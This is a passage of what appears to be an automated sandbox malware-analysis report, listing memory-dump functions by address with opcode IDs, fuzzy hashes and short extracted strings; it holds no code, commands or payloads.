                                                            • Source File: 0000004D.00000002.3388251563.00007FF848BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_77_2_7ff848be0000_tqeRXJHxPWPPoiNqjJeEYdv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0ca8f530b04deabb66e1909625a81270e36fa92f42e0a4ebc0ee499826c719a2
                                                            • Instruction ID: 834c028e3d72a74bde2e4b32da26bcfcb549b33ccfa138ee310ed72568f6f1ee
                                                            • Opcode Fuzzy Hash: 0ca8f530b04deabb66e1909625a81270e36fa92f42e0a4ebc0ee499826c719a2
                                                            • Instruction Fuzzy Hash: 9231C13090D68A8FDB45FB64C8559B97BF0FF1A341F1505BAC009CB6A2DB2C6841CB55
                                                            Function 00007FF848BE0998 Relevance: .1, Instructions: 97COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000004D.00000002.3388251563.00007FF848BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_77_2_7ff848be0000_tqeRXJHxPWPPoiNqjJeEYdv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d5feb18671f0b1f92e8a146f02fc11d9189a800c3bb59502b61d3dec7538dfe5
                                                            • Instruction ID: 4a242836f6350c95464832c26c345b9d4fee02ce308dbd41dcd102e8f2a6da14
                                                            • Opcode Fuzzy Hash: d5feb18671f0b1f92e8a146f02fc11d9189a800c3bb59502b61d3dec7538dfe5
                                                            • Instruction Fuzzy Hash: 9B214920B1C9491FE758FB2C904A6B977C5EF9C391F5000BDE40DC32D3DE28AC818284
                                                            Function 00007FF848BE0C25 Relevance: .1, Instructions: 96COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000004D.00000002.3388251563.00007FF848BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_77_2_7ff848be0000_tqeRXJHxPWPPoiNqjJeEYdv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a553af19a32659474f909105bab53136a7561fa9d580f3a5f049ae8aaabda1c2
                                                            • Instruction ID: a72a88708f7bb8472176924e93ca47ac1a02440f90bf5fb329e7953bfadc3257
                                                            • Opcode Fuzzy Hash: a553af19a32659474f909105bab53136a7561fa9d580f3a5f049ae8aaabda1c2
                                                            • Instruction Fuzzy Hash: 4831F77290DA4A9FE702BB6898452FC7BB0FF42351F1445B6D0088B6C3DB3C258AC799
                                                            Function 00007FF848BE5E63 Relevance: .1, Instructions: 87COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000004D.00000002.3388251563.00007FF848BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_77_2_7ff848be0000_tqeRXJHxPWPPoiNqjJeEYdv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2fe5d5a14311ea3ea52d91e1884b57c9622863d633f92697abb784f73df7d398
                                                            • Instruction ID: f5c1c56b7f5f5c02df604c2ebbb0e0d7eddcd23f3456a3b812ad50aa21f6a745
                                                            • Opcode Fuzzy Hash: 2fe5d5a14311ea3ea52d91e1884b57c9622863d633f92697abb784f73df7d398
                                                            • Instruction Fuzzy Hash: 21215E30E1C90A4FEBA4FA2894557B872D1FF58390F5441B5D45ED3A92EF2CAC428788
                                                            Function 00007FF848BE1B3B Relevance: .1, Instructions: 57COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000004D.00000002.3388251563.00007FF848BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_77_2_7ff848be0000_tqeRXJHxPWPPoiNqjJeEYdv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 823c3ee75ffc0c97b1133354810f3cbe8d6ab5cd42da079cf2c8e4b5373a2cda
                                                            • Instruction ID: 98f8fe658e6f979edde002fcb560702822dc04c39989764ff3ac7b04d587e516
                                                            • Opcode Fuzzy Hash: 823c3ee75ffc0c97b1133354810f3cbe8d6ab5cd42da079cf2c8e4b5373a2cda
                                                            • Instruction Fuzzy Hash: 7E01DB21F1CD0A8FEF94FA6C805977826D2FF94341F5540B5D40EC7AA2DE2CAC429748
                                                            Function 00007FF848BE0C40 Relevance: .1, Instructions: 51COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000004D.00000002.3388251563.00007FF848BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_77_2_7ff848be0000_tqeRXJHxPWPPoiNqjJeEYdv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1a384750628974eb191988cddf03dc382cbc88c49cee6296104278053e558427
                                                            • Instruction ID: e030f445e962b85609d07a535ad381faf8db30c656c846d06ab1be8b86db98be
                                                            • Opcode Fuzzy Hash: 1a384750628974eb191988cddf03dc382cbc88c49cee6296104278053e558427
                                                            • Instruction Fuzzy Hash: 4B11C03190DB889FE702FB7498501AC7BB0FF42351F1545F3C044DB692D638664A8B94
                                                            Function 00007FF848BE4D66 Relevance: .0, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000004D.00000002.3388251563.00007FF848BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_77_2_7ff848be0000_tqeRXJHxPWPPoiNqjJeEYdv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: eb66acba34dd9fc0f8f5638a5d8f45a0d6ec303faf5b6cae8289fbb92c24ebbd
                                                            • Instruction ID: 0992459f143079ec7b8443665d4afeb6d35b6dd49b00a4d7eb8f9baecbd8b83e
                                                            • Opcode Fuzzy Hash: eb66acba34dd9fc0f8f5638a5d8f45a0d6ec303faf5b6cae8289fbb92c24ebbd
                                                            • Instruction Fuzzy Hash: 5E11527094C5168FFB58AA04C4907B973A1EF55354F2440F9C41E97BC6CF3DAD858B48
                                                            Function 00007FF848BE22AD Relevance: .0, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000004D.00000002.3388251563.00007FF848BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_77_2_7ff848be0000_tqeRXJHxPWPPoiNqjJeEYdv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 66594a435fc5febea9e9767775029efbbe6d6bcb0fde19158ad729b9e63d8f76
                                                            • Instruction ID: 5dbd53c138bda7c799bc9e2a3265c6daadf5c5faeaadab51402e021c39b7b6d4
                                                            • Opcode Fuzzy Hash: 66594a435fc5febea9e9767775029efbbe6d6bcb0fde19158ad729b9e63d8f76
                                                            • Instruction Fuzzy Hash: CD112131A489188FDB54EB04C895BAD73E1FF58340F5105A9D00EE72A1CF38A9408B85
                                                            Function 00007FF848BE0C48 Relevance: .0, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000004D.00000002.3388251563.00007FF848BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_77_2_7ff848be0000_tqeRXJHxPWPPoiNqjJeEYdv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 46061fb0bf3affd5dcdd36c4455044fd3704a5aa4af8ea47dd3703ee761bee59
                                                            • Instruction ID: 783cc7d9bb588c662f270bc25283224ef8b6e08abdead51202d4713ede0f65fb
                                                            • Opcode Fuzzy Hash: 46061fb0bf3affd5dcdd36c4455044fd3704a5aa4af8ea47dd3703ee761bee59
                                                            • Instruction Fuzzy Hash: 72019E3190DB889FD702FB7488401AC7FB0FF42310F1541E7D044DB6A2D6389A49C795
                                                            Function 00007FF848BE0C50 Relevance: .0, Instructions: 40COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000004D.00000002.3388251563.00007FF848BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_77_2_7ff848be0000_tqeRXJHxPWPPoiNqjJeEYdv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ea9f19abbd9a48d09c63fa26ceab97117c4bf80350f51b771b511aafc82336d6
                                                            • Instruction ID: 251291b75501e61604a6d2159364f56bbbf01e3fdb24bc04ef0ee5c8264c9578
                                                            • Opcode Fuzzy Hash: ea9f19abbd9a48d09c63fa26ceab97117c4bf80350f51b771b511aafc82336d6
                                                            • Instruction Fuzzy Hash: 7401783090DB899FE702FBB488501AD7FB0FF06300F1441E2D044DB692DA389A898795
                                                            Function 00007FF848BE5F87 Relevance: .0, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000004D.00000002.3388251563.00007FF848BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_77_2_7ff848be0000_tqeRXJHxPWPPoiNqjJeEYdv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ce749b0e960016d5c2acbca1af00a585ae9a578d308ddd4ffd1434afba4a8635
                                                            • Instruction ID: d7872e06be3cab5ecde426d43eb42edfd155bf56c1f89187dc34dd42987089e6
                                                            • Opcode Fuzzy Hash: ce749b0e960016d5c2acbca1af00a585ae9a578d308ddd4ffd1434afba4a8635
                                                            • Instruction Fuzzy Hash: A0016D3091C80A8FEB64FA14CC867F873A0FB44351F1041B9C45E92991DE2C69868A85
                                                            Function 00007FF848BE5F3E Relevance: .0, Instructions: 34COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000004D.00000002.3388251563.00007FF848BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_77_2_7ff848be0000_tqeRXJHxPWPPoiNqjJeEYdv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: db8bf9ec5e88451419c03bf25d02a19787be88e2a439475d36952a615a5470ac
                                                            • Instruction ID: d080fdfb9804b7a78b7201f07641fd06d019d615538278f5ac39239ca1f3bdd8
                                                            • Opcode Fuzzy Hash: db8bf9ec5e88451419c03bf25d02a19787be88e2a439475d36952a615a5470ac
                                                            • Instruction Fuzzy Hash: 76F0303091C40A8FEB64F618E8867B83391FB54391F1481B9D85ED3D92DE2C7C868A89
                                                            Function 00007FF848BE0B87 Relevance: .0, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000004D.00000002.3388251563.00007FF848BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_77_2_7ff848be0000_tqeRXJHxPWPPoiNqjJeEYdv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 219628571ccd9c8580d774db79feb64ebbc2dc4ff318369a6b9ac2c7cab95818
                                                            • Instruction ID: 0d2c741ec7ef374ff08029d41daaeef2fe5b315b8e9c585dbba2a79126abfa1b
                                                            • Opcode Fuzzy Hash: 219628571ccd9c8580d774db79feb64ebbc2dc4ff318369a6b9ac2c7cab95818
                                                            • Instruction Fuzzy Hash: 96E086216598498FCB09BB3C9CA58E5FB60FB47254B8B00EAD04CC75A2E355585DC741
                                                            Function 00007FF848BE12E8 Relevance: .0, Instructions: 14COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000004D.00000002.3388251563.00007FF848BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_77_2_7ff848be0000_tqeRXJHxPWPPoiNqjJeEYdv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7b0807466e273422bcfb1cf230c82f027f4fc410fcf6cceac6ad6238913193f5
                                                            • Instruction ID: abdc657e7a3a855c09846e10842c7eb281929dfd8c16e3f7d8ab439ebaa3eccf
                                                            • Opcode Fuzzy Hash: 7b0807466e273422bcfb1cf230c82f027f4fc410fcf6cceac6ad6238913193f5
                                                            • Instruction Fuzzy Hash: 64C012305548088FCA48FB28C884D2473A0FB2A304B961094E00DCB2A1D72AECC2CB40
                                                            Function 00007FF848BE06A5 Relevance: .0, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000004D.00000002.3388251563.00007FF848BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_77_2_7ff848be0000_tqeRXJHxPWPPoiNqjJeEYdv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2a6148f374e2f37aa2c6c4aba6007f5d4285cfd58a983087f2709718e8b78489
                                                            • Instruction ID: b9fe45570297cd260a1800fe7072eca5aba27ab0914f1057f530c47f1bf97404
                                                            • Opcode Fuzzy Hash: 2a6148f374e2f37aa2c6c4aba6007f5d4285cfd58a983087f2709718e8b78489
                                                            • Instruction Fuzzy Hash: D7C08C04D1EC0B0FFA00B96E244A0BCA100BBD42A0FD00032C40C40CC1DE0D20D7015F
                                                            Function 00007FF848BE0708 Relevance: .0, Instructions: 12COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000004D.00000002.3388251563.00007FF848BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_77_2_7ff848be0000_tqeRXJHxPWPPoiNqjJeEYdv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8330e0558b660b4b0056c2e9ffd26dfad95a3688740041a8927d16767c759552
                                                            • Instruction ID: 17368139f8a1dacb6f786869eb0f9cec53344e27d0d5e273b6cc840f5e988781
                                                            • Opcode Fuzzy Hash: 8330e0558b660b4b0056c2e9ffd26dfad95a3688740041a8927d16767c759552
                                                            • Instruction Fuzzy Hash: CBC04C3052580D9FCA54F729C98596476A0FB09205BD510D0E409C7561E65A98549745
                                                            Function 00007FF848BE4D37 Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000004D.00000002.3388251563.00007FF848BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_77_2_7ff848be0000_tqeRXJHxPWPPoiNqjJeEYdv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 61a62bfef5e7436bf552db0b245af061c0568869abdc5f421183c75d69195da4
                                                            • Instruction ID: cd38e90942063cb468ee46e3a94702e9f392426cabd4d74b84cd08520849fd16
                                                            • Opcode Fuzzy Hash: 61a62bfef5e7436bf552db0b245af061c0568869abdc5f421183c75d69195da4
                                                            • Instruction Fuzzy Hash: 71C04C41F198162AE7696614511167E08569F84A45F514474E60EC67CBCF2D5A1312CE
                                                            Function 00007FF848BE06C8 Relevance: .0, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000004D.00000002.3388251563.00007FF848BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_77_2_7ff848be0000_tqeRXJHxPWPPoiNqjJeEYdv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 53249ff88f5ad3fd8eff551dcc8ad3a66af1e7e9ca8758f19f8b85f492a9693b
                                                            • Instruction ID: 20779cffb7dda3c3fc45b299dea2dc3103412a7452f27568bcfa4a6707d3aa4b
                                                            • Opcode Fuzzy Hash: 53249ff88f5ad3fd8eff551dcc8ad3a66af1e7e9ca8758f19f8b85f492a9693b
                                                            • Instruction Fuzzy Hash: 4FB01204C6E80F0EE504317E194A07970406B44150FC00070D80C50881D94D10A6025B

                                                            Non-executed Functions

                                                            Function 00007FF848BE09B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000004D.00000002.3388251563.00007FF848BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_77_2_7ff848be0000_tqeRXJHxPWPPoiNqjJeEYdv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: c9$!k9$"s9$#{9
                                                            • API String ID: 0-1692736845
                                                            • Opcode ID: c47b843cf3306b1dbd179aaac9096075a11a82b6c1b5854e25d52482159116e1
                                                            • Instruction ID: 13beca0d0e7572deca652cc6abb1098c7cf1e02a46ace2305948fe54b0ded23b
                                                            • Opcode Fuzzy Hash: c47b843cf3306b1dbd179aaac9096075a11a82b6c1b5854e25d52482159116e1
                                                            • Instruction Fuzzy Hash: A4418347A0FD666AEA113AFD74811FD5B64FF812F6F184677D24C894C38E28609282FD

                                                            Executed Functions

                                                            Function 00007FF848BF06C0 Relevance: 1.4, Instructions: 1440COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000004E.00000002.3658177583.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_78_2_7ff848bf0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 396c194ce083c361d0e3130224c24114e12acd39d3815fba1e5275dc42b7888b
                                                            • Instruction ID: 7f1c802bde19f8522f8e6428f04efa2317b8d52df2e9263b9ad05aa5cca3f66a
                                                            • Opcode Fuzzy Hash: 396c194ce083c361d0e3130224c24114e12acd39d3815fba1e5275dc42b7888b
                                                            • Instruction Fuzzy Hash: 71A29261E1C91A8FEB99FA2884916B873E2FF58740F1449B9D14DC36C7DF38AC828745
                                                            Function 00007FF848C110A5 Relevance: .5, Instructions: 464COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000004E.00000002.3658177583.00007FF848C11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C11000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_78_2_7ff848c11000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cfe74fc3ab86b9008e958d586f3835c05044a419bdccb402542d6605013b9abb
                                                            • Instruction ID: 70327f2b49bbe91fab2610c72bbddc858f09fe76f080acaeb199acb87aa07b02
                                                            • Opcode Fuzzy Hash: cfe74fc3ab86b9008e958d586f3835c05044a419bdccb402542d6605013b9abb
                                                            • Instruction Fuzzy Hash: BBC18C3192D7960FE35DA9284CC20B57791EB92255F28937EC9DB83487DE1CB4078ACA
                                                            Function 00007FF848C023FF Relevance: .3, Instructions: 262COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000004E.00000002.3658177583.00007FF848C01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C01000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_78_2_7ff848c01000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6f907e478f0d748e558c7566df5fffd97cc42d17a7a92435593e1ad2a0831338
                                                            • Instruction ID: 4f807ede49abc6a52e0ccbbb39c53290face629475d204887a861b5add612728
                                                            • Opcode Fuzzy Hash: 6f907e478f0d748e558c7566df5fffd97cc42d17a7a92435593e1ad2a0831338
                                                            • Instruction Fuzzy Hash: 4EA142A584E3C25FD7439BB05C316A17FB4AF13299F0E45EBE0C48F0A3E608195AD326
                                                            Function 00007FF848BE0D78 Relevance: .3, Instructions: 257COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000004E.00000002.3658177583.00007FF848BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_78_2_7ff848be0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4bec65ac8970176edfa8d69a5e729f6bd9c03d71945197392662ec2d2d3472f5
                                                            • Instruction ID: 9cac518e81fc888846e1500428279dc00066307343a878ca886c9e769c88abfb
                                                            • Opcode Fuzzy Hash: 4bec65ac8970176edfa8d69a5e729f6bd9c03d71945197392662ec2d2d3472f5
                                                            • Instruction Fuzzy Hash: 0191C075D28A898FE789EB2888683F97FF1FB96351F4000BAC049C76D2CB7994158751
                                                            Function 00007FF848C1A9FA Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000004E.00000002.3658177583.00007FF848C11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C11000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_78_2_7ff848c11000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: KH
                                                            • API String ID: 0-2411449328
                                                            • Opcode ID: 8aac65aa240f93f047d78268bf615edffbd909398883b2439ddc43deb142422f
                                                            • Instruction ID: de694eceabe6f99d89c405ba5b79534b87c24e55f709369bf0c844d143f4b1ed
                                                            • Opcode Fuzzy Hash: 8aac65aa240f93f047d78268bf615edffbd909398883b2439ddc43deb142422f
                                                            • Instruction Fuzzy Hash: 79F08C21E199099FE785FB68A4867F8B7E1FB58341F404176E00CC3193DF2898858B45
                                                            Function 00007FF848C0E289 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000004E.00000002.3658177583.00007FF848C01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C01000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_78_2_7ff848c01000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M
                                                            • API String ID: 0-3664761504
                                                            • Opcode ID: 3c0a04df300e26db8e6b6aa895593b2d6beceeefc4487506f67ca55b7a70bc17
                                                            • Instruction ID: 6c3af96563b8a2fdcd047e1da41828249971a4007d8fcf5a16ebd269a1a3b779
                                                            • Opcode Fuzzy Hash: 3c0a04df300e26db8e6b6aa895593b2d6beceeefc4487506f67ca55b7a70bc17
                                                            • Instruction Fuzzy Hash: E6F09B71D4E7C48FC75AEA3448654547F60EF6724174A52EEC045CF1A7EA2DCC49C711
                                                            Function 00007FF848C1A1D9 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000004E.00000002.3658177583.00007FF848C11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C11000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_78_2_7ff848c11000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M
                                                            • API String ID: 0-3664761504
                                                            • Opcode ID: 9300dee83d84e0301ea61a0fffa100c8383ae5f9debf24ecc32fa2805f376c71
                                                            • Instruction ID: d31a940acef282f75e9e89db7deb9a49937f9ee912007749ca2d441e3d5b547b
                                                            • Opcode Fuzzy Hash: 9300dee83d84e0301ea61a0fffa100c8383ae5f9debf24ecc32fa2805f376c71
                                                            • Instruction Fuzzy Hash: 1AF09B7164E7C48FD71AEA3488694547FA0EF6721174A42EFC045CF1A3EA1DCC89CB11
                                                            Function 00007FF848C12F19 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000004E.00000002.3658177583.00007FF848C11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C11000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_78_2_7ff848c11000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M
                                                            • API String ID: 0-3664761504
                                                            • Opcode ID: 90117775ab1a18e63148f92c341b8cc1d34a5fe36a5dd169be460db8af6c5fcb
                                                            • Instruction ID: 4235a04b4738a3b3a1b277df99f4fb92caf6468aa4e202b7c95c967baff47817
                                                            • Opcode Fuzzy Hash: 90117775ab1a18e63148f92c341b8cc1d34a5fe36a5dd169be460db8af6c5fcb
                                                            • Instruction Fuzzy Hash: 2DF0657190E7C48FC71BEA3448694547F60EF6720174A42EEC045CF1A7DA2DCC85CB01
                                                            Function 00007FF848C11BF9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000004E.00000002.3658177583.00007FF848C11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C11000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_78_2_7ff848c11000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M
                                                            • API String ID: 0-3664761504
                                                            • Opcode ID: 55abad10d587a11c0d2937c8e8eadedfe920f150e4a154e76f2b01d2ee0d549c
                                                            • Instruction ID: 320c1f0bfd305ec8af326b17c0049a709afe6ecf541bc29da68bad914d9bed91
                                                            • Opcode Fuzzy Hash: 55abad10d587a11c0d2937c8e8eadedfe920f150e4a154e76f2b01d2ee0d549c
                                                            • Instruction Fuzzy Hash: F7E09271A4E7C04FCB56EA348868454BFA0EF6721174A51EFC046CF1A7EA2DCC85CB01
                                                            Function 00007FF848C08FA9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000004E.00000002.3658177583.00007FF848C01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C01000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_78_2_7ff848c01000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: I
                                                            • API String ID: 0-3707901625
                                                            • Opcode ID: 495e2c97cd11932be01d89d2b4c666ef8c6bd4b35a7117a5363a55529edb24db
                                                            • Instruction ID: c68087deb6f3750399bd1216ea458f227982cabf0ff356467b9cdd909a7977c1
                                                            • Opcode Fuzzy Hash: 495e2c97cd11932be01d89d2b4c666ef8c6bd4b35a7117a5363a55529edb24db
                                                            • Instruction Fuzzy Hash: 57E0127184E7C44FC745EB7488698557FB0EF6725178A40DEC045CB1B3E61D8845C701
                                                            Function 00007FF848C17AE9 Relevance: 1.3, Strings: 1, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000004E.00000002.3658177583.00007FF848C11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C11000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_78_2_7ff848c11000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: I
                                                            • API String ID: 0-3707901625
                                                            • Opcode ID: 2cf623d209ae51d0aa8debf0a73147123594fcc87cba65defd3f5ffcf3f52128
                                                            • Instruction ID: 052d4ce3ced05501d80544dc9e14ef7943f9ba799ffb6efb73574f55fa0349c7
                                                            • Opcode Fuzzy Hash: 2cf623d209ae51d0aa8debf0a73147123594fcc87cba65defd3f5ffcf3f52128
                                                            • Instruction Fuzzy Hash: 37E012B194E3C44FC745EA348465A553F60EF67251B4A41DEC145CB1A7E71D8849C701
